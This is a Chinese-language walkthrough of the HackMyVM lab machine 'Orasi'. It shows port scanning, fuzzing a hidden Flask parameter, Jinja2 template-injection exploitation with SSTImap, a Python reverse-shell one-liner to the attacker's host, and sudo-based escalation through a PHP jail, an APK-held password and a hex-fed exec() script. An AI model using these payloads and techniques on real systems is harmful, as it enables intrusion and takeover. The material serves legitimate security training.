40.orasi
1. 基本信息^toc
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sCV 192.168.212.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-06 11:57 CST
Nmap scan report for bbr.thl (192.168.212.4)
Host is up (0.00058s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.212.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Feb 11 2021 pub
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 8a:07:93:8e:8a:d6:67:fe:d0:10:88:14:61:49:5a:66 (RSA)
| 256 5a:cd:25:31:ec:f2:02:a8:a8:ec:32:c9:63:89:b2:e3 (ECDSA)
|_ 256 39:70:57:cc:bb:9b:65:50:36:8d:71:00:a2:ac:24:36 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn''t have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
5000/tcp open http Werkzeug httpd 1.0.1 (Python 3.7.3)
|_http-server-header: Werkzeug/1.0.1 Python/3.7.3
|_http-title: 404 Not Found
MAC Address: 08:00:27:4B:94:89 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds
┌──(root㉿kali)-[~]
└─# nmap 192.168.212.4 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-06 11:58 CST
Nmap scan report for bbr.thl (192.168.212.4)
Host is up (0.00038s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
5000/tcp open upnp
MAC Address: 08:00:27:4B:94:89 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.12 seconds
2.2. 网站探测
┌──(root㉿kali)-[/home/kali/hmv/orasi]
└─# curl http://192.168.212.4
<head>
</head>
<body>
<h1>Orasi</h1>
<br>
<p>6 6 1337leet</p>
</body>
获取到一个提示
6 6 1337leet
2.3. 目录扫描
┌──(root㉿kali)-[/home/kali/hmv/orasi]
└─# dirsearch -u http://192.168.212.4
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/hmv/orasi/reports/http_192.168.212.4/_24-12-06_12-07-54.txt
Target: http://192.168.212.4/
[12:07:54] Starting:
Task Completed
没有什么东西
2.4. ftp匿名登录
可以获取到一个ELF类型的文件
ftp> ls -a
229 Entering Extended Passive Mode (|||45415|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Feb 11 2021 .
drwxr-xr-x 3 ftp ftp 4096 Feb 11 2021 ..
-rw-r--r-- 1 ftp ftp 16976 Feb 07 2021 url
┌──(root㉿kali)-[/home/kali/hmv/orasi]
└─# file url
url: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=ef3648aae50173281b64e2d9f71511b1b4abb0a3, for GNU/Linux 3.2.0, not stripped
2.5. 文件分析
现在应该是要从这个文件开始入手了
对Url文件进行逆向分析
这个看起来就像是一个路径
将其凭借起来
/sh4d0w$s
尝试访问
┌──(root㉿kali)-[/home/kali/hmv/orasi]
└─# curl http://192.168.212.4//sh4d0w$s
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
看来不是的
还有一个5000端口
这里提示我们需要一个参数
查看Server可以发现是一个flask框架,那很可能就是一个模版注入了
3. flask/jinja2 模版注入
从上图我们可以看出 jinja2 模版端口是5000
那这个靶机的多半也是jinja2的模版
但是要注入那我们肯定是需要一个参数的
3.1. 参数爆破
这个参数可以尝试爆破
试了一下常用的几个字典没有爆破出来
我想到了之前网站首页给我们的一个提示 6 6 1337leet
这看着像是一个crunsh生成字典的参数
尝试用这个生成字典
┌──(root㉿kali)-[/home/kali/hmv/orasi]
└─# crunch 6 6 leet1337 > wordlist.txt
Crunch will now generate the following amount of data: 326592 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 46656
然后进行爆破
┌──(root㉿kali)-[/home/kali/hmv/orasi]
└─# ffuf -u 'http://192.168.212.4:5000/sh4d0w$s?FUZZ=1' -w wordlist.txt |grep -v 'Size: 8'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.212.4:5000/sh4d0w$s?FUZZ=1
:: Wordlist : FUZZ: /home/kali/hmv/orasi/wordlist.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
l333tt [Status: 200, Size: 1, Words: 1, Lines: 1, Duration: 132ms]
成功爆破出参数为 l333tt
验证一下
http:/sh4d0w$s?l333tt={{2*2}}
使用 {{%s}} 解析成功 ,可以判断是 jinja2 的模版
3.2. 工具利用
这里我们应该没有过滤我们直接用工具SSTIMAP进行利用
-u 进行检测
python sstimap.py -u http://192.168.212.4:5000/sh4d0w$s?l333tt=1
成功检测出ssti模版注入。也检测出模版是 Jinja2
--os-shell 获取shell
python sstimap.py -u http://192.168.212.4:5000/sh4d0w$s?l333tt=1 --os-shell
[+] Run commands on the operating system.
posix-linux $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
下一步吧shell弹过来即可
3.3. 反弹shell
4. www-data提权用户kori
(remote) www-data@orasi:/tmp$ sudo -l
Matching Defaults entries for www-data on orasi:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on orasi:
(kori) NOPASSWD: /bin/php /home/kori/jail.php *
(remote) www-data@orasi:/tmp$ cat /home/kori/jail.php
<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
if($var == null) die("Orasis Jail, argument missing\n");
function filter($var) {
if(preg_match('/(`|bash|eval|nc|whoami|open|pass|require|include|file|system|\/)/i', $var)) {
return false;
}
return true;
}
if(filter($var)) {
$result = exec($var);
echo "$result\n";
echo "Command executed";
} else {
echo "Restricted characters has been used";
}
echo "\n";
?>
jail.php 这里存在一个命令执行。虽然过滤了很多命令。但是我们还可以用启动python
然后用python进行反弹
(remote) www-data@orasi:/var/www/html$ sudo -u kori /bin/php /home/kori/jail.php python
Python 2.7.16 (default, Oct 10 2019, 22:02:15)
[GCC 8.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.212.3",1888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
5. kori用户提权irida用户
(remote) kori@orasi:/var/www/html$ sudo -l
Matching Defaults entries for kori on orasi:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kori may run the following commands on orasi:
(irida) NOPASSWD: /usr/bin/cp /home/irida/irida.apk /home/kori/irida.apk
可以复制irida目录下面的apk到当前用户目录下面
复制之前先要创建一个 /home/kori/irida.apk 并且给权限
(remote) kori@orasi:/home/kori$ touch /home/kori/irida.apk
(remote) kori@orasi:/home/kori$ chmod 777 /home/kori/irida.apk
(remote) kori@orasi:/home/kori$ sudo -u irida /usr/bin/cp /home/irida/irida.apk /home/kori/irida.apk
然后传到本地。逆向分析一下
用jeb分析可以发现关键字符串
这个多半就是账号密码
右键解析
可以发现对 1 #2 #3 #4 #5 进行了处理
正确的密码应该是 eye.of.the.tiger.()
尝试登录发现是错误的。
靶机作者有给过一个提示。
只是一个无用的小点
可能是说有一个点没有用
经过测试 正确密码是 eye.of.the.tiger()
ssh登录成功
┌──(root㉿kali)-[/home/kali/hmv/orasi]
└─# ssh irida@192.168.212.4
irida@192.168.212.4''s password:
Linux orasi 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 11 18:48:10 2021 from 10.0.2.15
irida@orasi:~$ id
uid=1000(irida) gid=1000(irida) groups=1000(irida),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
irida@orasi:~$ cat user.txt
2afb9cbb10c22dc7e154a8c434595948
6. irida用户提权root
irida@orasi:~$ sudo -l
Matching Defaults entries for irida on orasi:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User irida may run the following commands on orasi:
(root) NOPASSWD: /usr/bin/python3 /root/oras.py
这里我们可以执行 root/oras.py
但是我们不知道脚本的具体内容
随便执行可以发现其中的报错
irida@orasi:~$ sudo -u root python3 /root/oras.py
: whomai
Traceback (most recent call last):
File "/root/oras.py", line 7, in <module>
name = bytes.fromhex(name).decode('utf-8')
ValueError: non-hexadecimal number found in fromhex() arg at position 0
name = bytes.fromhex(name).decode('utf-8')
很明显我们应该是要输入一个16进制的值
尝试输入 whoamI 的16进制值
irida@orasi:~$ sudo -u root python3 /root/oras.py
: 77686f616d69
Traceback (most recent call last):
File "/root/oras.py", line 8, in <module>
print(exec(name))
File "<string>", line 1, in <module>
NameError: name 'whoami' is not defined
还是报错了。但是又多了一个错误
print(exec(name))
明显这里会执行一个参数 name 而这里 name 我们输入16进制对应字符串是 whoami
这里用的是python执行。那我们就应该按照python调用系统命令的方式传递参数
string:import os;os.system('whoami');
696d706f7274206f733b6f732e73797374656d282777686f616d6927293b
irida@orasi:~$ sudo -u root python3 /root/oras.py
: 696d706f7274206f733b6f732e73797374656d282777686f616d6927293b
root
None
ok成功
那我们修改一下内容就行了
string:import os;os.system('cat /root/root.txt');
hex:696d706f7274206f733b6f732e73797374656d2827636174202f726f6f742f726f6f742e74787427293b
irida@orasi:~$ sudo -u root python3 /root/oras.py
: 696d706f7274206f733b6f732e73797374656d2827636174202f726f6f742f726f6f742e74787427293b
b1c17c79773c831cbb9109802059c6b5
None
最后,这是python的代码
import os
import base64
import re
import sys
name = input(": ")
name = bytes.fromhex(name).decode('utf-8')
print(exec(name))